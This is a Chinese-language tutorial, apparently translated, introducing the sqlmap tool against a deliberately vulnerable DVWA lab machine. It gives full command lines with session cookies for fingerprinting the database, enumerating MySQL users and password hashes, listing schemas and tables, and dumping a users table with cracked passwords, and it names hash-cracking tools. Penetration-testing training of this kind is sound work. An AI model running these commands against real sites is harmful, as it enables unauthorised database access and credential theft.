热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

SQL注入之SQLmap入门

什么是SQLmap?SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。读者可以通过位于SourceForge的官方网站下载SQLmap源码:SQLmap的作者是谁?BernardoDa

什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码: SQLmap的作者是谁? Bernardo Da

  什么是SQLmap?

  SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。

  读者可以通过位于SourceForge的官方网站下载SQLmap源码:

  SQLmap的作者是谁?

  Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过bernardo@sqlmap.org与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过miroslav@sqlmap.org与他联系。

  同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。

  执行SQLmap的命令是什么?

  进入sqlmap.py所在的目录,执行以下命令:

  #python sqlmap.py -h

  (译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧)

  SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。

  如何使用SQLmap:

  为方便演示,我们创建两个虚拟机:

  1、受害者机器, windows XP操作系统,运行一个web服务器,同时跑着一个包含漏洞的web应用(DVWA)。

  2、攻击器机器,使用Ubuntu 12.04,包含SQLmap程序。

  本次实验的目的:使用SQLmap得到以下信息:

  3、枚举MYSQL用户名与密码。

  4、枚举所有数据库。

  5、枚举指定数据库的数据表。

  6、枚举指定数据表中的所有用户名与密码。

  使用SQLmap之前我们得到需要当前会话COOKIEs等信息,用来在渗透过程中维持连接状态,这里使用Firefox中名为“TamperData”的add-on获取。

SQL注入之SQLmap入门 三联

  当前得到的COOKIE为“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。

  为方便演示,我们将DVWA安全等级设置为low:

SQL注入之SQLmap入门

  接下来我们进入页面的“SQL Injection”部分,输入任意值并提交。可以看到get请求的ID参数如下:

  “?id=1&Submit=Submit#”

  因此该页面就是我们的目标页面。

  以下命令可以用来检索当前数据库和当前用户:

  “./sqlmap.py -u“?id=1&Submit=Submit” –COOKIE=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

  使用选项:

  1、–COOKIE : 设置我们的COOKIE值“将DVWA安全等级从high设置为low”

  2、-u : 指定目标URL

  3、-b : 获取DBMS banner

  4、–current-db : 获取当前数据库

  5、–current-user:获取当前用户

  结果如下:

SQL注入之SQLmap入门

  可以看到结果如下:

  DBMS : MySQLversion 5.0

  OS versionUbuntu 12.04

  current user:root

  current db :DVWA

  以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:

  “sqlmap.py -u“?id=1&Submit=Submit” --COOKIE=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”

  使用选项:

  1、–string : 当查询可用时用来匹配页面中的字符串

  2、–users : 枚举DBMS用户

  3、–password : 枚举DBMS用户密码hash

SQL注入之SQLmap入门

  结果如下:

  [*] ”@’kingasmk’

  [*]”@’localhost’

  [*]‘debian-sys-maint’@'localhost’

  [*]‘phpmyadmin’@'localhost’

  [*]‘root’@’127.0.0.1′

  [*] ‘root’@'::1′

  [*]‘root’@'kingasmk’

  [*]‘root’@'localhost’

  数据库管理系统用户和密码hash:

  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

  [*] phpmyadmin[1]:

  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

  [*] root [4]:

  password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

  读者可以使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema:

  “sqlmap.py -u“?id=1&Submit=Submit”

  --COOKIE=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”

  使用选项:

  –dbs: 枚举DBMS中的数据库

SQL注入之SQLmap入门

  结果如下:

  [*]dvwa

  [*]information_schema

  [*]mysql

  [*]performance_schema

  [*]phpmyadmin

  下面我们尝试枚举DVWA数据表,执行以下命令:

  “sqlmap.py-u “?id=1&Submit=Submit” --COOKIE=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”

  使用选项:

  1、-D : 要枚举的DBMS数据库

  2、–tables : 枚举DBMS数据库中的数据表

SQL注入之SQLmap入门

  得到结果如下:

  Database: dvwa

  [2 tables]

  +————+

  | guestbook |

  | users |

  +————+

  下面获取用户表的列,命令如下:

  “sqlmap.py -u“?id=1&Submit=Submit” --COOKIE=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”

  使用选项:

  -T : 要枚举的DBMS数据库表

  –columns : 枚举DBMS数据库表中的所有列

SQL注入之SQLmap入门

  结果如下:

  Database: dvwa

  Table: users

  [6 columns]

  +————+————-+

  | Column | Type|

  +————+————-+

  | avatar |varchar(70) |

  | first_name |varchar(15) |

  | last_name |varchar(15) |

  | password |varchar(32) |

  | user |varchar(15) |

  | user_id |int(6) |

  +————+————-+

  如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,,将用户与密码表中的所有用户名与密码dump出来:

  “sqlmap.py -u“?id=1&Submit=Submit”–COOKIE=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”

  使用选项:

  -T : 要枚举的DBMS数据表

  -C: 要枚举的DBMS数据表中的列

  –dump : 转储DBMS数据表项

  SQLmap会提问是否破解密码,按回车确认:

SQL注入之SQLmap入门

  得到所有用户名与明文密码如下:

  Table: users

  [5 entries]

  +———+———+———————————————+

  | user_id | user| password |

  +———+———+———————————————+

  | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |

  | 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |

  | 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |

  | 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |

  | 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |

  +———+———+———————————————+

  这时我们就可以利用admin帐户登录做任何事了。

  总结:

  SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。

  [via infosecinstitute]

:更多精彩教程请关注三联教程频道

推荐阅读
  • 分享css中提升优先级属性!important的用法总结
    web前端|css教程css!importantweb前端-css教程本文分享css中提升优先级属性!important的用法总结微信门店展示源码,vscode如何管理站点,ubu ... [详细]
  • 在说Hibernate映射前,我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象,以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]
  • 如何实现织梦DedeCms全站伪静态
    本文介绍了如何通过修改织梦DedeCms源代码来实现全站伪静态,以提高管理和SEO效果。全站伪静态可以避免重复URL的问题,同时通过使用mod_rewrite伪静态模块和.htaccess正则表达式,可以更好地适应搜索引擎的需求。文章还提到了一些相关的技术和工具,如Ubuntu、qt编程、tomcat端口、爬虫、php request根目录等。 ... [详细]
  • 本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • 搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的详细步骤
    本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的步骤,包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]
  • 本文介绍了在SpringBoot中集成thymeleaf前端模版的配置步骤,包括在application.properties配置文件中添加thymeleaf的配置信息,引入thymeleaf的jar包,以及创建PageController并添加index方法。 ... [详细]
  • 使用Ubuntu中的Python获取浏览器历史记录原文: ... [详细]
  • Oracle分析函数first_value()和last_value()的用法及原理
    本文介绍了Oracle分析函数first_value()和last_value()的用法和原理,以及在查询销售记录日期和部门中的应用。通过示例和解释,详细说明了first_value()和last_value()的功能和不同之处。同时,对于last_value()的结果出现不一样的情况进行了解释,并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ... [详细]
  • 本文介绍了关于apache、phpmyadmin、mysql、php、emacs、path等知识点,以及如何搭建php环境。文章提供了详细的安装步骤和所需软件列表,希望能帮助读者解决与LAMP相关的技术问题。 ... [详细]
  • 高质量SQL书写的30条建议
    本文提供了30条关于优化SQL的建议,包括避免使用select *,使用具体字段,以及使用limit 1等。这些建议是基于实际开发经验总结出来的,旨在帮助读者优化SQL查询。 ... [详细]
  • 众筹商城与传统商城的区别及php众筹网站的程序源码
    本文介绍了众筹商城与传统商城的区别,包括所售产品和玩法不同以及运营方式不同。同时还提到了php众筹网站的程序源码和方维众筹的安装和环境问题。 ... [详细]
  • 如何在php中将mysql查询结果赋值给变量
    本文介绍了在php中将mysql查询结果赋值给变量的方法,包括从mysql表中查询count(学号)并赋值给一个变量,以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法,并提供了示例代码。 ... [详细]
  • 31.项目部署
    目录1一些概念1.1项目部署1.2WSGI1.3uWSGI1.4Nginx2安装环境与迁移项目2.1项目内容2.2项目配置2.2.1DEBUG2.2.2STAT ... [详细]
  • MySQL语句大全:创建、授权、查询、修改等【MySQL】的使用方法详解
    本文详细介绍了MySQL语句的使用方法,包括创建用户、授权、查询、修改等操作。通过连接MySQL数据库,可以使用命令创建用户,并指定该用户在哪个主机上可以登录。同时,还可以设置用户的登录密码。通过本文,您可以全面了解MySQL语句的使用方法。 ... [详细]
  • 本文介绍了在Ubuntu下制作deb安装包及离线安装包的方法,通过备份/var/cache/apt/archives文件夹中的安装包,并建立包列表及依赖信息文件,添加本地源,更新源列表,可以在没有网络的情况下更新系统。同时提供了命令示例和资源下载链接。 ... [详细]
author-avatar
一飞冲天的快乐_549
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有